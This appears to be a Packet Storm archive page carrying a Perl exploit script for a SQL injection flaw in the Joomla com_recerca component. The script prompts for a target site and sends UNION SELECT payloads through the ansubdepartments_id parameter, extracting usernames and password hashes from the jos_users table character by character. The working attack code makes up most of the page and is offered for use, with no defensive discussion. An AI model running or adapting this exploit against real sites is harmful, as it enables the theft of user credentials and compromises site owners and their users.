exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Recerca SQL Injection

Joomla Recerca SQL Injection
Posted Oct 8, 2009
Authored by Don Tukulesto | Site indonesiancoder.com

The Joomla Recerca component suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 918fd128c5b2063a82b782b1023a1fc630b16609a39c38665e043e91dd4b2b13
Download | Favorite | View

Joomla Recerca SQL Injection

Change Mirror Download
#!/usr/bin/perl

#=========================== [ root@indonesiancoder.com $ ~] ===========================#
# [~] Joomla Components com_recerca (ansubdepartments_id) SQL Injection Vulneralbility  #
# [~] Author  : Don Tukulesto                #
# [~] Homepage  : http://www.indonesiancoder.com                                  #
# [~] Tune in  : http://www.AntiSecradio.fm ( choose your weapon )      #
# [~] Gracias  : IndonesianCoder.com - AntiSecurity.org - ServerIsDown.org - MainHack  #
# [~] kaMtiEz, M3NW5, arianom, Jack-, Yadoy666, Gonzhack, SoulNet, s4va, tiw0L, Kill-9  #
# [~] SAINT, CYB3R_TR0N, M364TR0N, NoGe, TUCKER, Ian Petrucii, RoNz, Chercut, YOU !!  #
#=========================== [ root@indonesiancoder.com $ ~] ===========================#


use HTTP::Request;
use LWP::UserAgent;

$cmsapp = 'Joomla Component com_recerca';
$vuln   = 'index.php?option=com_recerca&task=linia&ansubdepartments_id=';
$column = 'concat(username,0x3a,password)tukulesto';
$table  = 'jos_users';
$regexp = 'No elements defined';
$maxlen = 65;

my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }

printf "\n
                $cmsapp
 [x]====================================================[x]
  |           www[dot]IndonesianCoder[dot]com            |
 [x]====================================================[x]

\n";

print " [~] URL Path : "; chomp($web=<STDIN>);
print " [~] Valid ID : "; chomp($id=<STDIN>);
print " [~] Column   : "; chomp($columns=<STDIN>);

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";

sub get_data() {
  @columns = split(/,/, $columns);
  foreach $column (@columns) {
    print " [exploiting\@$web] SELECT $column FROM $table please wait...\n";
    syswrite(STDOUT, " [exploiting\@$web] $column\@$table > ", 255);
    for (my $i=1; $i<=$maxlen; $i++) {
      my $chr = 0;
      my $found = 1;
      my $char = 48;
      while (!$chr && $char<=90) {
        if(exploit($i,$char) !~ /$regexp/) {
          $chr = 1;
          $found = 1;
          syswrite(STDOUT,chr($char),1);
        } else { $found = 0; }
        $char++;
      }
      if(!$chr) {
        $char = 97;
        while(!$chr && $char<=122) {
          if(exploit($i,$char) !~ /$regexp/) {
            $chr = 1;
            $found = 1;
            syswrite(STDOUT,chr($char),1);
          } else { $found = 0; }
          $char++;
        }
      }
      if (!$found) {
        print "\n"; last;
      }
    }
  }
}

sub exploit() {
  my $limit = $_[0];
  my $chars = $_[1];
  my $shits = '+union+select+1,2,3,'.$column.',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+'.$table.'--';
  my $inject = $target.$vuln.$id.$shits;
  my $content = get_content($inject);
  return $content;
}

sub get_content() {
  my $url = $_[0];
  my $req = HTTP::Request->new(GET => $url);
  my $ua  = LWP::UserAgent->new();
  $ua->timeout(15);
  my $res = $ua->request($req);
  if ($res->is_error){
    print "\n\n [!] Error, ".$res->status_line.".\n\n";
    exit;
  }
  return $res->content;
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close